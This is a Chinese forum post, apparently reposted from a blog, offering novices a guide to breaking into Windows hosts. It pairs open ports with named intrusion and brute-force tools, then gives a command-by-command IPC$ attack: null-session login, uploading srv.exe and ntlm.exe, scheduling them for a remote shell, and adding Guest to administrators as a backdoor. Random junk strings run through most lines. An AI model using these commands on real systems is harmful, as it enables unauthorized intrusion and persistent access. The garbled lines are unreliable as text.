TA的每日心情 | 衰 2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu8 N8 X5 T7 ` A7 N
希望对新手入侵有帮助! ! W9 C$ ~5 [% I7 M( w% y% h! J
1. 1433端口入侵
0 l- K6 ^! O4 ~! z2 A% T scanport.exe 查有1433的机器
3 }1 M# e/ a/ n. U0 N- K SQLScanPass.exe 进行字典暴破(字典是关键)" s0 T. X+ a" g4 D
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
" b5 {# ~' n% ]0 Q( Y# u nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口( c+ N4 K" }: }2 B
(以上反向的,测试成功)! s% v6 M; z& Z
sqlhelloz.exe 入侵ip 1433 (这个是正向连接). h$ h0 D! Y7 r% `" ^+ P
2. 4899端口入侵' B C4 Y* Q ~
用4899过滤器.exe,扫描空口令的机器
5 i% J9 S) R! ], t9 d& ^7 y: e/ } 3. 3899的入侵8 S* N* @, @3 Y
对很早的机器,可以试试3389的溢出(win3389ex.exe)
9 v2 ?/ z" E1 a 对2000的机器,可以试试字典暴破。(tscrack.exe)
" O$ p+ B9 w5 M/ v( x% s1 s 4. 80入侵
) p5 I2 o8 `+ {8 X% ^: S7 t 对sp3以前的机器,可以用webdav入侵;
5 U. \" u: i: M 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
& ^: r2 f* e7 I" [; Y2 C 可以利用SQL进行注入。(啊D的注入软件)。: A- ?3 `& i% m5 Q1 J
5. serv-u入侵(21端口)
9 a9 d1 i' S# S 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)5 m" P0 @( z( P! }0 M+ [
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)% m0 j, ~& w Z6 a+ a* x
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)% q. A0 u" c5 i
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码6 T7 R' H) D g) [4 v4 e' {0 g" D
6. 554端口
; M6 |. g# O$ n$ ` 用real554.exe入侵。
) y8 M( `( e9 j7 v0 W" t8 D( ~ |+ s! B 7. 6129端口
: T f0 F* L1 D3 `: y- I, ~ \ 用DameWare6129.exe入侵。, r, q' ]0 w3 W. h
8. 系统漏洞7 `5 _9 q% ?/ H# v2 I' T/ v
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
* N! m1 o" a3 S" t9. 3127等端口6 ^ j6 y5 n$ {3 G( ~% e7 D% r
- I# C7 F N- w- ?: q* p
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。- g( Y8 ]' B% F6 u# N
10. 其他入侵. @3 P O y6 r) O) ?) J
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
( c: F, c) l7 Z9 F
/ P5 b1 u$ D0 U! Q6 `- ` 经典IPC$入侵
) o m; s, w0 P& j" H
) M4 \9 e" e7 N9 [6 T 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"3 G8 I8 i' y; t
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。! k9 ~6 J" x# W( R% n- @
2. C:\>copy srv.exe $">\\127.0.0.1\admin$
& b; L G! ~2 @3 e 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
/ \ J% ~: t: S$ [ 3. C:\>net time file://127.0.0.1/
: m0 X) B% h0 g+ p* h$ _ 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
8 Z5 H/ d) E0 U$ |5 }/ p" J 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
) ]* n# r5 N0 P8 m' J 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
; {8 _+ c l" m/ J# ~) o 5. C:\>net time file://127.0.0.1/
7 }. `; N8 G* K' c4 h, M 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
9 _; B- ?( B9 T6 H. O 6. C:\>telnet 127.0.0.1 991 f: B! Y3 H! y" l/ o* }
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
% F2 W M5 @7 q8 B: k 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了; l& s+ F" u! {( s/ n! B, L: X9 B- v
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
' G E. G) \ E! H" ]% w; [. n$ [ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。& |& M- h2 k! E+ i. L$ m- M
8. C:\WINNT\system32>ntlm2 H# ?/ A; M: F& v' [" t5 V- S
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!$ |) d0 h8 o$ _% W; B8 `& x
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组0 O' G, i2 X0 ^. P; o$ |( }0 Y/ y
10. C:\>net user guest /active:yes l u$ f# B N# M u# \# x
将对方的Guest用户激活$ V6 T- |3 }9 S1 y. `9 w: A& G# Z
11. C:\>net user guest 1234
& `+ _+ I/ E0 h1 S! ]1 g 将Guest的密码改为1234,或者你要设定的密码
/ p' `# j8 d# G" y0 @. O 12. C:\>net localgroup administrators guest /add
3 ~" J! U# v8 y9 B# t+ I; A! G 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|